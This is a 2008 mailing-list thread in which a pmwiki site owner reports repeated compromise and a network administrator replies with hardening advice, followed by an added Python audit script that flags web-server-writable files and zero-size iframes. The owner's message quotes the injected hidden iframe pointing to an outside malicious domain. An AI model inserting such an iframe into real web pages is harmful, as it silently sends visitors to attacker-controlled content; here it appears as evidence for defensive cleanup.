[pmwiki-users] More hacking
Greg T. Grimes
greg.grimes at msstate.edu
Wed Sep 3 08:18:25 CDT 2008
Are these files writeable by the web server? Do you allow uploads to your
site? Standard security practice says not to allow the web server write
access to any files on your system. This is especially true for your
webpages. If you do allow uploads you might want to check your upload
directory for files that could be used to gain access to your server.
c99shell is an example. Another thing to look for is file include
vulnerabilities. For example, if you take input for a form and then use
that input to include a certain file based on the input, this can be used
to launch scripts that aren't even hosted on your server. I'm currently
not aware of any File Include Vulns in pmwiki. Just a quick look at the
code and I don't see any obvious ones.
On Wed, 3 Sep 2008, Erik Haagensen wrote:
> Our site has been hacked several times during the last month.
> It has been cleaned and checked by Site Analyzer - all ok.
> After some days we have problems again.
> The index.php (and several other files) contains this now:
> <?php include('pmwiki.php');
> <iframe src="http://mixlong.cn/in/" width=0 height=0 frameborder=0></iframe>
> I don't know what more to do to avoid these problems.
> Erik Haagensen
> NO-2550 Os i Østerdalen
Greg T. Grimes
ITS -- Network Services
Mississippi State University
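
The two checks suggested in the reply above (which files the web server account can write to, and which files carry a hidden iframe like the one in the quoted index.php), as an added example that is not part of the original thread. The function names, the sample tree and the uid/gid passed in are assumptions; the write check uses POSIX mode bits only.

```python
import os
import re
import stat
import tempfile

# Zero-size iframe like the injected line quoted in the message above.
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?0\b)"
    rb"(?=[^>]*\bheight\s*=\s*[\"']?0\b)[^>]*>", re.IGNORECASE)

def writable_by(st, uid, gids):
    """POSIX mode bits only (no ACLs): may this uid/gid set write the file?"""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def audit(root, web_uid, web_gids):
    """Return (writable, injected) lists of paths relative to root."""
    writable, injected = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            rel = os.path.relpath(path, root)
            if writable_by(st, web_uid, web_gids):
                writable.append(rel)
            with open(path, "rb") as fh:
                if HIDDEN_IFRAME.search(fh.read()):
                    injected.append(rel)
    return sorted(writable), sorted(injected)

def demo():
    """Constructed sample tree, audited as an account that owns none of it."""
    samples = {"index.php": (b"<?php include('pmwiki.php');\n<iframe src="
               b'"http://example.invalid/" width=0 height=0></iframe>\n', 0o666),
               "clean.php": (b"<?php include('pmwiki.php');\n", 0o644)}
    with tempfile.TemporaryDirectory() as root:
        for name, (body, mode) in samples.items():
            path = os.path.join(root, name)
            with open(path, "wb") as fh:
                fh.write(body)
            os.chmod(path, mode)
        owner = os.stat(root)
        return audit(root, owner.st_uid + 1, {owner.st_gid + 1})
```

On a real host, call audit() with the document root and the uid and group ids of the account the web server runs as.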